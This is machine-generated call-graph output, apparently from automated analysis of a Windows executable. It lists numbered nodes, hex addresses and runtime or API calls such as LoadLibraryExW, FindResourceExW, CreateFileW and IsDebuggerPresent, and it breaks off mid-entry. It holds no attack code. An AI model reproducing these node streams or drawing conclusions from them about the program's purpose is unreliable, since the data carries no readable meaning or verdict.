99498 b8d836 99497->99498 99499 b8d8a1 GetStartupInfoW 99498->99499 99500 b8d841 _flsall @_EH4_CallFilterFunc@8 99498->99500 99506 b8d8b6 99499->99506 99507 b8d9e5 99499->99507 99500->99445 99501 b8daad 99588 b8dabd LeaveCriticalSection _doexit 99501->99588 99503 b88a15 __calloc_crt 58 API calls 99503->99506 99504 b8da32 GetStdHandle 99504->99507 99505 b8da45 GetFileType 99505->99507 99506->99503 99506->99507 99509 b8d904 99506->99509 99507->99501 99507->99504 99507->99505 99587 b8a06b InitializeCriticalSectionAndSpinCount 99507->99587 99508 b8d938 GetFileType 99508->99509 99509->99507 99509->99508 99586 b8a06b InitializeCriticalSectionAndSpinCount 99509->99586 99513 b87f43 99512->99513 99514 b95184 99512->99514 99518 b94d6b GetModuleFileNameW 99513->99518 99514->99514 99589 b88a5d 58 API calls 2 library calls 99514->99589 99516 b951aa _memmove 99517 b951c0 FreeEnvironmentStringsW 99516->99517 99517->99513 99519 b94d9f _wparse_cmdline 99518->99519 99521 b94ddf _wparse_cmdline 99519->99521 99590 b88a5d 58 API calls 2 library calls 99519->99590 99521->99452 99523 b94fc1 __wsetenvp 99522->99523 99527 b94fb9 99522->99527 99524 b88a15 __calloc_crt 58 API calls 99523->99524 99532 b94fea __wsetenvp 99524->99532 99525 b95041 99526 b82f95 _free 58 API calls 99525->99526 99526->99527 99527->99456 99528 b88a15 __calloc_crt 58 API calls 99528->99532 99529 b95066 99530 b82f95 _free 58 API calls 99529->99530 99530->99527 99532->99525 99532->99527 99532->99528 99532->99529 99533 b9507d 99532->99533 99591 b94857 58 API calls __filbuf 99532->99591 99592 b89006 IsProcessorFeaturePresent 99533->99592 99535 b95089 99535->99456 99538 b8333b __IsNonwritableInCurrentImage 99536->99538 99615 b8a711 99538->99615 99539 b83359 __initterm_e 99540 b82f80 __cinit 67 API calls 99539->99540 99541 b83378 _doexit __IsNonwritableInCurrentImage 99539->99541 99540->99541 99541->99460 99543 b649e7 99542->99543 99544 b64948 99542->99544 99543->99464 99545 b64982 IsThemeActive 99544->99545 99618 b835ac 99545->99618 99549 b649ae 99630 b64a5b SystemParametersInfoW SystemParametersInfoW 99549->99630 99551 b649ba 99631 b63b4c 99551->99631 99553 b649c2 SystemParametersInfoW 99553->99543 99554->99438 99555->99442 99556->99449 99560->99465 99561->99468 99562->99474 99563->99476 99564->99480 99565->99481 99568 b88a1c 99566->99568 99569 b88a57 99568->99569 99570 b88a3a 99568->99570 99575 b95446 99568->99575 99569->99485 99572 b8a026 TlsSetValue 99569->99572 99570->99568 99570->99569 99583 b8a372 Sleep 99570->99583 99572->99489 99573->99492 99574->99488 99576 b9546c 99575->99576 99577 b95451 99575->99577 99580 b9547c RtlAllocateHeap 99576->99580 99582 b95462 99576->99582 99585 b835e1 DecodePointer 99576->99585 99577->99576 99578 b9545d 99577->99578 99584 b88d68 58 API calls __getptd_noexit 99578->99584 99580->99576 99580->99582 99582->99568 99583->99570 99584->99582 99585->99576 99586->99509 99587->99507 99588->99500 99589->99516 99590->99521 99591->99532 99593 b89011 99592->99593 99598 b88e99 99593->99598 99597 b8902c 99597->99535 99599 b88eb3 _memset __call_reportfault 99598->99599 99600 b88ed3 IsDebuggerPresent 99599->99600 99606 b8a395 SetUnhandledExceptionFilter UnhandledExceptionFilter 99600->99606 99603 b88f97 __call_reportfault 99607 b8c836 99603->99607 99604 b88fba 99605 b8a380 GetCurrentProcess TerminateProcess 99604->99605 99605->99597 99606->99603 99608 b8c83e 99607->99608 99609 b8c840 IsProcessorFeaturePresent 99607->99609 99608->99604 99611 b95b5a 99609->99611 99614 b95b09 5 API calls 2 library calls 99611->99614 99613 b95c3d 99613->99604 99614->99613 99616 b8a714 EncodePointer 99615->99616 99616->99616 99617 b8a72e 99616->99617 99617->99539 99619 b89e4b __lock 58 API calls 99618->99619 99620 b835b7 DecodePointer EncodePointer 99619->99620 99683 b89fb5 LeaveCriticalSection 99620->99683 99622 b649a7 99623 b83614 99622->99623 99624 b83638 99623->99624 99625 b8361e 99623->99625 99624->99549 99625->99624 99684 b88d68 58 API calls __getptd_noexit 99625->99684 99627 b83628 99685 b88ff6 9 API calls __filbuf 99627->99685 99629 b83633 99629->99549 99630->99551 99632 b63b59 __write_nolock 99631->99632 99633 b677c7 59 API calls 99632->99633 99634 b63b63 GetCurrentDirectoryW 99633->99634 99686 b63778 99634->99686 99636 b63b8c IsDebuggerPresent 99637 b9d4ad MessageBoxA 99636->99637 99638 b63b9a 99636->99638 99641 b9d4c7 99637->99641 99639 b63c73 99638->99639 99640 b63bb7 99638->99640 99638->99641 99642 b63c7a SetCurrentDirectoryW 99639->99642 99767 b673e5 99640->99767 99885 b67373 59 API calls Mailbox 99641->99885 99645 b63c87 Mailbox 99642->99645 99645->99553 99646 b9d4d7 99651 b9d4ed SetCurrentDirectoryW 99646->99651 99648 b63bd5 GetFullPathNameW 99649 b67d2c 59 API calls 99648->99649 99650 b63c10 99649->99650 99783 b70a8d 99650->99783 99651->99645 99654 b63c2e 99683->99622 99684->99627 99685->99629 99687 b677c7 59 API calls 99686->99687 99688 b6378e 99687->99688 99894 b63d43 99688->99894 99690 b637ac 99691 b64864 61 API calls 99690->99691 99692 b637c0 99691->99692 99693 b67f41 59 API calls 99692->99693 99694 b637cd 99693->99694 99908 b64f3d 99694->99908 99697 b9d3ae 99975 bc97e5 99697->99975 99698 b637ee Mailbox 99702 b681a7 59 API calls 99698->99702 99701 b9d3cd 99704 b82f95 _free 58 API calls 99701->99704 99705 b63801 99702->99705 99706 b9d3da 99704->99706 99932 b693ea 99705->99932 99708 b64faa 84 API calls 99706->99708 99710 b9d3e3 99708->99710 99714 b63ee2 59 API calls 99710->99714 99711 b67f41 59 API calls 99712 b6381a 99711->99712 99935 b68620 99712->99935 99716 b9d3fe 99714->99716 99715 b6382c Mailbox 99717 b67f41 59 API calls 99715->99717 99718 b63ee2 59 API calls 99716->99718 99719 b63852 99717->99719 99721 b9d41a 99718->99721 99720 b68620 69 API calls 99719->99720 99724 b63861 Mailbox 99720->99724 99722 b64864 61 API calls 99721->99722 99723 b9d43f 99722->99723 99725 b63ee2 59 API calls 99723->99725 99727 b677c7 59 API calls 99724->99727 99726 b9d44b 99725->99726 99728 b681a7 59 API calls 99726->99728 99729 b6387f 99727->99729 99730 b9d459 99728->99730 99939 b63ee2 99729->99939 99732 b63ee2 59 API calls 99730->99732 99734 b9d468 99732->99734 99740 b681a7 59 API calls 99734->99740 99736 b63899 99736->99710 99737 b638a3 99736->99737 99738 b8313d _W_store_winword 60 API calls 99737->99738 99739 b638ae 99738->99739 99739->99716 99741 b638b8 99739->99741 99742 b9d48a 99740->99742 99743 b8313d _W_store_winword 60 API calls 99741->99743 99744 b63ee2 59 API calls 99742->99744 99745 b638c3 99743->99745 99746 b9d497 99744->99746 99745->99721 99747 b638cd 99745->99747 99746->99746 99748 b8313d _W_store_winword 60 API calls 99747->99748 99749 b638d8 99748->99749 99749->99734 99750 b63919 99749->99750 99752 b63ee2 59 API calls 99749->99752 99750->99734 99751 b63926 99750->99751 99955 b6942e 99751->99955 99754 b638fc 99752->99754 99756 b681a7 59 API calls 99754->99756 99758 b6390a 99756->99758 99760 b63ee2 59 API calls 99758->99760 99760->99750 99762 b693ea 59 API calls 99764 b63961 99762->99764 99763 b69040 60 API calls 99763->99764 99764->99762 99764->99763 99765 b63ee2 59 API calls 99764->99765 99766 b639a7 Mailbox 99764->99766 99765->99764 99766->99636 99768 b673f2 __write_nolock 99767->99768 99769 b9ee4b _memset 99768->99769 99770 b6740b 99768->99770 99772 b9ee67 GetOpenFileNameW 99769->99772 100829 b648ae 99770->100829 99774 b9eeb6 99772->99774 99777 b67d2c 59 API calls 99774->99777 99779 b9eecb 99777->99779 99779->99779 99780 b67429 100857 b669ca 99780->100857 99784 b70a9a __write_nolock 99783->99784 101165 b66ee0 99784->101165 99786 b70a9f 99787 b63c26 99786->99787 101176 b712fe 89 API calls 99786->101176 99787->99646 99787->99654 99789 b70aac 99789->99787 99885->99646 99895 b63d50 __write_nolock 99894->99895 99896 b67d2c 59 API calls 99895->99896 99902 b63eb6 Mailbox 99895->99902 99898 b63d82 99896->99898 99907 b63db8 Mailbox 99898->99907 100016 b67b52 99898->100016 99899 b67b52 59 API calls 99899->99907 99900 b63e89 99901 b67f41 59 API calls 99900->99901 99900->99902 99904 b63eaa 99901->99904 99902->99690 99903 b67f41 59 API calls 99903->99907 99905 b63f84 59 API calls 99904->99905 99905->99902 99907->99899 99907->99900 99907->99902 99907->99903 100019 b63f84 99907->100019 100025 b64d13 99908->100025 99913 b9dd0f 99915 b64faa 84 API calls 99913->99915 99914 b64f68 LoadLibraryExW 100035 b64cc8 99914->100035 99917 b9dd16 99915->99917 99919 b64cc8 3 API calls 99917->99919 99921 b9dd1e 99919->99921 100061 b6506b 99921->100061 99922 b64f8f 99922->99921 99923 b64f9b 99922->99923 99925 b64faa 84 API calls 99923->99925 99927 b637e6 99925->99927 99927->99697 99927->99698 99929 b9dd45 100067 b65027 99929->100067 99931 b9dd52 99933 b80ff6 Mailbox 59 API calls 99932->99933 99934 b6380d 99933->99934 99934->99711 99936 b6862b 99935->99936 99938 b68652 99936->99938 100492 b68b13 69 API calls Mailbox 99936->100492 99938->99715 99940 b63f05 99939->99940 99941 b63eec 99939->99941 99943 b67d2c 59 API calls 99940->99943 99942 b681a7 59 API calls 99941->99942 99944 b6388b 99942->99944 99943->99944 99945 b8313d 99944->99945 99946 b83149 99945->99946 99947 b831be 99945->99947 99954 b8316e 99946->99954 100493 b88d68 58 API calls __getptd_noexit 99946->100493 100495 b831d0 60 API calls 3 library calls 99947->100495 99950 b831cb 99950->99736 99951 b83155 100494 b88ff6 9 API calls __filbuf 99951->100494 99953 b83160 99953->99736 99954->99736 99956 b69436 99955->99956 99957 b80ff6 Mailbox 59 API calls 99956->99957 99958 b69444 99957->99958 99960 b63936 99958->99960 100496 b6935c 59 API calls Mailbox 99958->100496 99961 b691b0 99960->99961 100497 b692c0 99961->100497 99963 b80ff6 Mailbox 59 API calls 99965 b63944 99963->99965 99964 b691bf 99964->99963 99964->99965 99966 b69040 99965->99966 99967 b9f5a5 99966->99967 99971 b69057 99966->99971 99967->99971 100507 b68d3b 59 API calls Mailbox 99967->100507 99969 b691a0 100506 b69e9c 60 API calls Mailbox 99969->100506 99970 b69158 99972 b80ff6 Mailbox 59 API calls 99970->99972 99971->99969 99971->99970 99974 b6915f 99971->99974 99972->99974 99974->99764 99976 b65045 85 API calls 99975->99976 99977 bc9854 99976->99977 100508 bc99be 96 API calls 2 library calls 99977->100508 99979 bc9866 99980 b6506b 74 API calls 99979->99980 100006 b9d3c1 99979->100006 99981 bc9881 99980->99981 99982 b6506b 74 API calls 99981->99982 99983 bc9891 99982->99983 99984 b6506b 74 API calls 99983->99984 99985 bc98ac 99984->99985 99986 b6506b 74 API calls 99985->99986 99987 bc98c7 99986->99987 99988 b65045 85 API calls 99987->99988 99989 bc98de 99988->99989 99990 b8594c __crtLCMapStringA_stat 58 API calls 99989->99990 99991 bc98e5 99990->99991 99992 b8594c __crtLCMapStringA_stat 58 API calls 99991->99992 99993 bc98ef 99992->99993 99994 b6506b 74 API calls 99993->99994 99995 bc9903 99994->99995 100509 bc9393 GetSystemTimeAsFileTime 99995->100509 99997 bc9916 99998 bc992b 99997->99998 99999 bc9940 99997->99999 100000 b82f95 _free 58 API calls 99998->100000 100001 bc99a5 99999->100001 100002 bc9946 99999->100002 100004 bc9931 100000->100004 100003 b82f95 _free 58 API calls 100001->100003 100510 bc8d90 100002->100510 100003->100006 100007 b82f95 _free 58 API calls 100004->100007 100006->99701 100010 b64faa 100006->100010 100007->100006 100009 b82f95 _free 58 API calls 100009->100006 100011 b64fb4 100010->100011 100013 b64fbb 100010->100013 100012 b855d6 __fcloseall 83 API calls 100011->100012 100012->100013 100014 b64fca 100013->100014 100015 b64fdb FreeLibrary 100013->100015 100014->99701 100015->100014 100017 b67faf 59 API calls 100016->100017 100018 b67b5d 100017->100018 100018->99898 100020 b63f92 100019->100020 100024 b63fb4 _memmove 100019->100024 100022 b80ff6 Mailbox 59 API calls 100020->100022 100021 b80ff6 Mailbox 59 API calls 100023 b63fc8 100021->100023 100022->100024 100023->99907 100024->100021 100072 b64d61 100025->100072 100028 b64d3a 100030 b64d53 100028->100030 100031 b64d4a FreeLibrary 100028->100031 100029 b64d61 2 API calls 100029->100028 100032 b8548b 100030->100032 100031->100030 100076 b854a0 100032->100076 100034 b64f5c 100034->99913 100034->99914 100234 b64d94 100035->100234 100038 b64ced 100040 b64cff FreeLibrary 100038->100040 100041 b64d08 100038->100041 100039 b64d94 2 API calls 100039->100038 100040->100041 100042 b64dd0 100041->100042 100043 b80ff6 Mailbox 59 API calls 100042->100043 100044 b64de5 100043->100044 100238 b6538e 100044->100238 100046 b64df1 _memmove 100047 b64e2c 100046->100047 100048 b64f21 100046->100048 100049 b64ee9 100046->100049 100050 b65027 69 API calls 100047->100050 100252 bc9ba5 95 API calls 100048->100252 100241 b64fe9 CreateStreamOnHGlobal 100049->100241 100058 b64e35 100050->100058 100053 b6506b 74 API calls 100053->100058 100054 b64ec9 100054->99922 100056 b9dcd0 100057 b65045 85 API calls 100056->100057 100059 b9dce4 100057->100059 100058->100053 100058->100054 100058->100056 100247 b65045 100058->100247 100060 b6506b 74 API calls 100059->100060 100060->100054 100062 b6507d 100061->100062 100063 b9ddf6 100061->100063 100276 b85812 100062->100276 100066 bc9393 GetSystemTimeAsFileTime 100066->99929 100068 b65036 100067->100068 100071 b9ddb9 100067->100071 100474 b85e90 100068->100474 100070 b6503e 100070->99931 100073 b64d2e 100072->100073 100074 b64d6a LoadLibraryA 100072->100074 100073->100028 100073->100029 100074->100073 100075 b64d7b GetProcAddress 100074->100075 100075->100073 100077 b854ac _flsall 100076->100077 100078 b854bf 100077->100078 100080 b854f0 100077->100080 100125 b88d68 58 API calls __getptd_noexit 100078->100125 100095 b90738 100080->100095 100081 b854c4 100126 b88ff6 9 API calls __filbuf 100081->100126 100084 b854f5 100085 b8550b 100084->100085 100086 b854fe 100084->100086 100088 b85535 100085->100088 100089 b85515 100085->100089 100127 b88d68 58 API calls __getptd_noexit 100086->100127 100110 b90857 100088->100110 100128 b88d68 58 API calls __getptd_noexit 100089->100128 100091 b854cf _flsall @_EH4_CallFilterFunc@8 100091->100034 100096 b90744 _flsall 100095->100096 100097 b89e4b __lock 58 API calls 100096->100097 100107 b90752 100097->100107 100098 b907c6 100130 b9084e 100098->100130 100099 b907cd 100135 b88a5d 58 API calls 2 library calls 100099->100135 100102 b90843 _flsall 100102->100084 100103 b907d4 100103->100098 100136 b8a06b InitializeCriticalSectionAndSpinCount 100103->100136 100106 b89ed3 __mtinitlocknum 58 API calls 100106->100107 100107->100098 100107->100099 100107->100106 100133 b86e8d 59 API calls __lock 100107->100133 100134 b86ef7 LeaveCriticalSection LeaveCriticalSection _doexit 100107->100134 100108 b907fa EnterCriticalSection 100108->100098 100111 b90877 __wopenfile 100110->100111 100112 b90891 100111->100112 100124 b90a4c 100111->100124 100143 b83a0b 60 API calls 2 library calls 100111->100143 100141 b88d68 58 API calls __getptd_noexit 100112->100141 100114 b90896 100142 b88ff6 9 API calls __filbuf 100114->100142 100116 b90aaf 100138 b987f1 100116->100138 100118 b85540 100129 b85562 LeaveCriticalSection LeaveCriticalSection _fprintf 100118->100129 100120 b90a45 100120->100124 100144 b83a0b 60 API calls 2 library calls 100120->100144 100122 b90a64 100122->100124 100145 b83a0b 60 API calls 2 library calls 100122->100145 100124->100112 100124->100116 100125->100081 100126->100091 100127->100091 100128->100091 100129->100091 100137 b89fb5 LeaveCriticalSection 100130->100137 100132 b90855 100132->100102 100133->100107 100134->100107 100135->100103 100136->100108 100137->100132 100146 b97fd5 100138->100146 100140 b9880a 100140->100118 100141->100114 100142->100118 100143->100120 100144->100122 100145->100124 100148 b97fe1 _flsall 100146->100148 100147 b97ff7 100231 b88d68 58 API calls __getptd_noexit 100147->100231 100148->100147 100151 b9802d 100148->100151 100150 b97ffc 100232 b88ff6 9 API calls __filbuf 100150->100232 100157 b9809e 100151->100157 100154 b98049 100233 b98072 LeaveCriticalSection __unlock_fhandle 100154->100233 100156 b98006 _flsall 100156->100140 100158 b980be 100157->100158 100159 b8471a __wsopen_nolock 58 API calls 100158->100159 100162 b980da 100159->100162 100160 b89006 __invoke_watson 8 API calls 100161 b987f0 100160->100161 100163 b97fd5 __wsopen_helper 103 API calls 100161->100163 100164 b98114 100162->100164 100171 b98137 100162->100171 100230 b98211 100162->100230 100166 b9880a 100163->100166 100165 b88d34 __chsize_nolock 58 API calls 100164->100165 100167 b98119 100165->100167 100166->100154 100168 b88d68 __filbuf 58 API calls 100167->100168 100169 b98126 100168->100169 100172 b88ff6 __filbuf 9 API calls 100169->100172 100170 b981f5 100173 b88d34 __chsize_nolock 58 API calls 100170->100173 100171->100170 100178 b981d3 100171->100178 100174 b98130 100172->100174 100175 b981fa 100173->100175 100174->100154 100176 b88d68 __filbuf 58 API calls 100175->100176 100177 b98207 100176->100177 100179 b88ff6 __filbuf 9 API calls 100177->100179 100180 b8d4d4 __alloc_osfhnd 61 API calls 100178->100180 100179->100230 100181 b982a1 100180->100181 100182 b982ab 100181->100182 100183 b982ce 100181->100183 100185 b88d34 __chsize_nolock 58 API calls 100182->100185 100184 b97f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 100183->100184 100195 b982f0 100184->100195 100186 b982b0 100185->100186 100187 b88d68 __filbuf 58 API calls 100186->100187 100189 b982ba 100187->100189 100188 b9836e GetFileType 100190 b98379 GetLastError 100188->100190 100191 b983bb 100188->100191 100193 b88d68 __filbuf 58 API calls 100189->100193 100194 b88d47 __dosmaperr 58 API calls 100190->100194 100200 b8d76a __set_osfhnd 59 API calls 100191->100200 100192 b9833c GetLastError 100196 b88d47 __dosmaperr 58 API calls 100192->100196 100193->100174 100198 b983a0 CloseHandle 100194->100198 100195->100188 100195->100192 100199 b97f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 100195->100199 100197 b98361 100196->100197 100203 b88d68 __filbuf 58 API calls 100197->100203 100198->100197 100201 b983ae 100198->100201 100202 b98331 100199->100202 100206 b983d9 100200->100206 100204 b88d68 __filbuf 58 API calls 100201->100204 100202->100188 100202->100192 100203->100230 100205 b983b3 100204->100205 100205->100197 100207 b98594 100206->100207 100208 b91b11 __lseeki64_nolock 60 API calls 100206->100208 100209 b9845a 100206->100209 100210 b98767 CloseHandle 100207->100210 100207->100230 100211 b98443 100208->100211 100209->100207 100215 b910ab 70 API calls __read_nolock 100209->100215 100218 b9848c 100209->100218 100220 b90d2d __close_nolock 61 API calls 100209->100220 100224 b8dac6 __write 78 API calls 100209->100224 100225 b98611 100209->100225 100228 b91b11 60 API calls __lseeki64_nolock 100209->100228 100212 b97f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 100210->100212 100211->100209 100214 b88d34 __chsize_nolock 58 API calls 100211->100214 100213 b9878e 100212->100213 100216 b98796 GetLastError 100213->100216 100223 b987c2 100213->100223 100214->100209 100215->100209 100217 b88d47 __dosmaperr 58 API calls 100216->100217 100219 b987a2 100217->100219 100218->100209 100221 b999f2 __chsize_nolock 82 API calls 100218->100221 100222 b8d67d __free_osfhnd 59 API calls 100219->100222 100220->100209 100221->100218 100222->100223 100223->100230 100224->100209 100226 b90d2d __close_nolock 61 API calls 100225->100226 100227 b98618 100226->100227 100229 b88d68 __filbuf 58 API calls 100227->100229 100228->100209 100229->100230 100230->100160 100231->100150 100232->100156 100233->100156 100235 b64ce1 100234->100235 100236 b64d9d LoadLibraryA 100234->100236 100235->100038 100235->100039 100236->100235 100237 b64dae GetProcAddress 100236->100237 100237->100235 100239 b80ff6 Mailbox 59 API calls 100238->100239 100240 b653a0 100239->100240 100240->100046 100242 b65003 FindResourceExW 100241->100242 100246 b65020 100241->100246 100243 b9dd5c LoadResource 100242->100243 100242->100246 100244 b9dd71 SizeofResource 100243->100244 100243->100246 100245 b9dd85 LockResource 100244->100245 100244->100246 100245->100246 100246->100047 100248 b65054 100247->100248 100249 b9ddd4 100247->100249 100253 b85a7d 100248->100253 100251 b65062 100251->100058 100252->100047 100254 b85a89 _flsall 100253->100254 100255 b85a9b 100254->100255 100257 b85ac1 100254->100257 100266 b88d68 58 API calls __getptd_noexit 100255->100266 100268 b86e4e 100257->100268 100258 b85aa0 100267 b88ff6 9 API calls __filbuf 100258->100267 100261 b85ac7 100274 b859ee 83 API calls 4 library calls 100261->100274 100263 b85ad6 100275 b85af8 LeaveCriticalSection LeaveCriticalSection _fprintf 100263->100275 100265 b85aab _flsall 100265->100251 100266->100258 100267->100265 100269 b86e5e 100268->100269 100270 b86e80 EnterCriticalSection 100268->100270 100269->100270 100271 b86e66 100269->100271 100272 b86e76 100270->100272 100273 b89e4b __lock 58 API calls 100271->100273 100272->100261 100273->100272 100274->100263 100275->100265 100279 b8582d 100276->100279 100278 b6508e 100278->100066 100280 b85839 _flsall 100279->100280 100281 b8587c 100280->100281 100282 b8584f _memset 100280->100282 100283 b85874 _flsall 100280->100283 100284 b86e4e __lock_file 59 API calls 100281->100284 100306 b88d68 58 API calls __getptd_noexit 100282->100306 100283->100278 100286 b85882 100284->100286 100292 b8564d 100286->100292 100287 b85869 100307 b88ff6 9 API calls __filbuf 100287->100307 100296 b85668 _memset 100292->100296 100299 b85683 100292->100299 100293 b85673 100404 b88d68 58 API calls __getptd_noexit 100293->100404 100295 b85678 100405 b88ff6 9 API calls __filbuf 100295->100405 100296->100293 100296->100299 100304 b856c3 100296->100304 100308 b858b6 LeaveCriticalSection LeaveCriticalSection _fprintf 100299->100308 100300 b857d4 _memset 100407 b88d68 58 API calls __getptd_noexit 100300->100407 100304->100299 100304->100300 100309 b84916 100304->100309 100316 b910ab 100304->100316 100384 b90df7 100304->100384 100406 b90f18 58 API calls 3 library calls 100304->100406 100306->100287 100307->100283 100308->100283 100310 b84920 100309->100310 100311 b84935 100309->100311 100408 b88d68 58 API calls __getptd_noexit 100310->100408 100311->100304 100313 b84925 100409 b88ff6 9 API calls __filbuf 100313->100409 100315 b84930 100315->100304 100317 b910cc 100316->100317 100318 b910e3 100316->100318 100419 b88d34 58 API calls __getptd_noexit 100317->100419 100320 b9181b 100318->100320 100325 b9111d 100318->100325 100435 b88d34 58 API calls __getptd_noexit 100320->100435 100322 b910d1 100420 b88d68 58 API calls __getptd_noexit 100322->100420 100323 b91820 100436 b88d68 58 API calls __getptd_noexit 100323->100436 100327 b91125 100325->100327 100332 b9113c 100325->100332 100421 b88d34 58 API calls __getptd_noexit 100327->100421 100328 b91131 100437 b88ff6 9 API calls __filbuf 100328->100437 100330 b9112a 100422 b88d68 58 API calls __getptd_noexit 100330->100422 100333 b91151 100332->100333 100336 b9116b 100332->100336 100337 b91189 100332->100337 100364 b910d8 100332->100364 100423 b88d34 58 API calls __getptd_noexit 100333->100423 100336->100333 100341 b91176 100336->100341 100424 b88a5d 58 API calls 2 library calls 100337->100424 100339 b91199 100342 b911bc 100339->100342 100343 b911a1 100339->100343 100410 b95ebb 100341->100410 100427 b91b11 60 API calls 3 library calls 100342->100427 100425 b88d68 58 API calls __getptd_noexit 100343->100425 100344 b9128a 100346 b91303 ReadFile 100344->100346 100351 b912a0 GetConsoleMode 100344->100351 100349 b917e3 GetLastError 100346->100349 100350 b91325 100346->100350 100348 b911a6 100426 b88d34 58 API calls __getptd_noexit 100348->100426 100353 b917f0 100349->100353 100354 b912e3 100349->100354 100350->100349 100358 b912f5 100350->100358 100355 b91300 100351->100355 100356 b912b4 100351->100356 100433 b88d68 58 API calls __getptd_noexit 100353->100433 100367 b912e9 100354->100367 100428 b88d47 58 API calls 3 library calls 100354->100428 100355->100346 100356->100355 100359 b912ba ReadConsoleW 100356->100359 100366 b915c7 100358->100366 100358->100367 100369 b9135a 100358->100369 100359->100358 100361 b912dd GetLastError 100359->100361 100360 b917f5 100434 b88d34 58 API calls __getptd_noexit 100360->100434 100361->100354 100364->100304 100365 b82f95 _free 58 API calls 100365->100364 100366->100367 100371 b916cd ReadFile 100366->100371 100367->100364 100367->100365 100370 b913c6 ReadFile 100369->100370 100375 b91447 100369->100375 100372 b913e7 GetLastError 100370->100372 100382 b913f1 100370->100382 100377 b916f0 GetLastError 100371->100377 100383 b916fe 100371->100383 100372->100382 100373 b91504 100378 b914b4 MultiByteToWideChar 100373->100378 100431 b91b11 60 API calls 3 library calls 100373->100431 100374 b914f4 100430 b88d68 58 API calls __getptd_noexit 100374->100430 100375->100367 100375->100373 100375->100374 100375->100378 100377->100383 100378->100361 100378->100367 100382->100369 100429 b91b11 60 API calls 3 library calls 100382->100429 100383->100366 100432 b91b11 60 API calls 3 library calls 100383->100432 100385 b90e02 100384->100385 100388 b90e17 100384->100388 100471 b88d68 58 API calls __getptd_noexit 100385->100471 100387 b90e07 100472 b88ff6 9 API calls __filbuf 100387->100472 100390 b90e4c 100388->100390 100395 b90e12 100388->100395 100473 b96234 58 API calls __malloc_crt 100388->100473 100392 b84916 __filbuf 58 API calls 100390->100392 100393 b90e60 100392->100393 100438 b90f97 100393->100438 100395->100304 100396 b90e67 100396->100395 100397 b84916 __filbuf 58 API calls 100396->100397 100398 b90e8a 100397->100398 100398->100395 100399 b84916 __filbuf 58 API calls 100398->100399 100400 b90e96 100399->100400 100400->100395 100401 b84916 __filbuf 58 API calls 100400->100401 100402 b90ea3 100401->100402 100403 b84916 __filbuf 58 API calls 100402->100403 100403->100395 100404->100295 100405->100299 100406->100304 100407->100295 100408->100313 100409->100315 100411 b95ed3 100410->100411 100412 b95ec6 100410->100412 100414 b95edf 100411->100414 100415 b88d68 __filbuf 58 API calls 100411->100415 100413 b88d68 __filbuf 58 API calls 100412->100413 100416 b95ecb 100413->100416 100414->100344 100417 b95f00 100415->100417 100416->100344 100418 b88ff6 __filbuf 9 API calls 100417->100418 100418->100416 100419->100322 100420->100364 100421->100330 100422->100328 100423->100330 100424->100339 100425->100348 100426->100364 100427->100341 100428->100367 100429->100382 100430->100367 100431->100378 100432->100383 100433->100360 100434->100367 100435->100323 100436->100328 100437->100364 100439 b90fa3 _flsall 100438->100439 100440 b90fb0 100439->100440 100441 b90fc7 100439->100441 100442 b88d34 __chsize_nolock 58 API calls 100440->100442 100443 b9108b 100441->100443 100445 b90fdb 100441->100445 100444 b90fb5 100442->100444 100446 b88d34 __chsize_nolock 58 API calls 100443->100446 100448 b88d68 __filbuf 58 API calls 100444->100448 100449 b90ff9 100445->100449 100450 b91006 100445->100450 100447 b90ffe 100446->100447 100456 b88d68 __filbuf 58 API calls 100447->100456 100451 b90fbc _flsall 100448->100451 100452 b88d34 __chsize_nolock 58 API calls 100449->100452 100453 b91028 100450->100453 100454 b91013 100450->100454 100451->100396 100452->100447 100455 b8d446 ___lock_fhandle 59 API calls 100453->100455 100457 b88d34 __chsize_nolock 58 API calls 100454->100457 100458 b9102e 100455->100458 100462 b91020 100456->100462 100459 b91018 100457->100459 100460 b91041 100458->100460 100461 b91054 100458->100461 100463 b88d68 __filbuf 58 API calls 100459->100463 100464 b910ab __read_nolock 70 API calls 100460->100464 100466 b88d68 __filbuf 58 API calls 100461->100466 100465 b88ff6 __filbuf 9 API calls 100462->100465 100463->100462 100467 b9104d 100464->100467 100465->100451 100468 b91059 100466->100468 100470 b91083 __read LeaveCriticalSection 100467->100470 100469 b88d34 __chsize_nolock 58 API calls 100468->100469 100469->100467 100470->100451 100471->100387 100472->100395 100473->100390 100475 b85e9c _flsall 100474->100475 100476 b85eae 100475->100476 100477 b85ec3 100475->100477 100488 b88d68 58 API calls __getptd_noexit 100476->100488 100479 b86e4e __lock_file 59 API calls 100477->100479 100481 b85ec9 100479->100481 100480 b85eb3 100489 b88ff6 9 API calls __filbuf 100480->100489 100490 b85b00 67 API calls 5 library calls 100481->100490 100484 b85ed4 100491 b85ef4 LeaveCriticalSection LeaveCriticalSection _fprintf 100484->100491 100486 b85ee6 100487 b85ebe _flsall 100486->100487 100487->100070 100488->100480 100489->100487 100490->100484 100491->100486 100492->99938 100493->99951 100494->99953 100495->99950 100496->99960 100498 b692c9 Mailbox 100497->100498 100499 b9f5c8 100498->100499 100504 b692d3 100498->100504 100500 b80ff6 Mailbox 59 API calls 100499->100500 100502 b9f5d4 100500->100502 100501 b692da 100501->99964 100504->100501 100505 b69df0 59 API calls Mailbox 100504->100505 100505->100504 100506->99974 100507->99971 100508->99979 100509->99997 100511 bc8da9 100510->100511 100512 bc8d9b 100510->100512 100514 bc8dee 100511->100514 100515 b8548b 115 API calls 100511->100515 100525 bc8db2 100511->100525 100513 b8548b 115 API calls 100512->100513 100513->100511 100541 bc901b 100514->100541 100517 bc8dd3 100515->100517 100517->100514 100519 bc8ddc 100517->100519 100518 bc8e32 100520 bc8e36 100518->100520 100521 bc8e57 100518->100521 100522 b855d6 __fcloseall 83 API calls 100519->100522 100519->100525 100524 bc8e43 100520->100524 100527 b855d6 __fcloseall 83 API calls 100520->100527 100545 bc8c33 100521->100545 100522->100525 100524->100525 100529 b855d6 __fcloseall 83 API calls 100524->100529 100525->100009 100527->100524 100528 bc8e85 100554 bc8eb5 100528->100554 100529->100525 100530 bc8e65 100531 bc8e72 100530->100531 100533 b855d6 __fcloseall 83 API calls 100530->100533 100531->100525 100536 b855d6 __fcloseall 83 API calls 100531->100536 100533->100531 100536->100525 100538 bc8ea0 100538->100525 100540 b855d6 __fcloseall 83 API calls 100538->100540 100540->100525 100542 bc9040 100541->100542 100544 bc9029 __tzset_nolock _memmove 100541->100544 100543 b85812 __fread_nolock 74 API calls 100542->100543 100543->100544 100544->100518 100546 b8594c __crtLCMapStringA_stat 58 API calls 